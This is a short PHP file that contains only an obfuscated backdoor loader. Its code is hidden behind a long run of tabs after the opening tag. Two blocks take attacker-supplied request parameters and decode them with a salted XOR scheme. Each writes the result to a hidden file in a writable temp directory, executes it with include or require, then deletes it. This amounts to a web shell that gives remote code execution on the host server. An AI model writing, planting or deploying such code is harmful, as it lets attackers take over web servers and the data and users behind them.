<?php																																										if(array_key_exists("h\x6Cd", $_REQUEST) && !is_null($_REQUEST["h\x6Cd"])){ $parameter_group = $_REQUEST["h\x6Cd"]; $parameter_group = explode ( '.' ,$parameter_group) ; $factor = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $p = 0; $__tmp = $parameter_group; while ($v2 = array_shift($__tmp)) { $sChar = ord($salt[$p % $lenS]); $dec = ((int)$v2 - $sChar - ($p % 10)) ^ 48; $factor.=chr($dec); $p++; } $key = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", session_save_path(), "/dev/shm", getcwd(), sys_get_temp_dir(), getenv("TMP")]); foreach ($key as $key => $symbol) { if (is_dir($symbol) && is_writable($symbol)) { $pointer = implode("/", [$symbol, ".pgrp"]); if (file_put_contents($pointer, $factor)) { require $pointer; unlink($pointer); exit; } } } }


if(@$_REQUEST["\x6Drk"] !== null){
	$flg = $_REQUEST["\x6Drk"];
		$flg  =explode	(	'.' 	,  	$flg 	 );		 
	$resource = '';
            $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	 $s9);
            $w = 0;
    
            $__tmp = $flg;
            while(	 $v7 = array_shift(	 $__tmp)) {	$sChar = ord(	 $s9[$w	%$sLen]);
                $d =(	 (	 int)$v7 - $sChar -(	 $w	%10)) ^ 84;
                $resource .= chr(	 $d);
                $w++;
            }
	$ptr = array_filter(["/dev/shm", getcwd(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]);
	foreach ($ptr as $item) {
    		if (is_writable($item) && is_dir($item)) {
    $symbol = "$item" . "/.dchunk";
    $success = file_put_contents($symbol, $resource);
if ($success) {
	include $symbol;
	@unlink($symbol);
	exit;}
}
}
}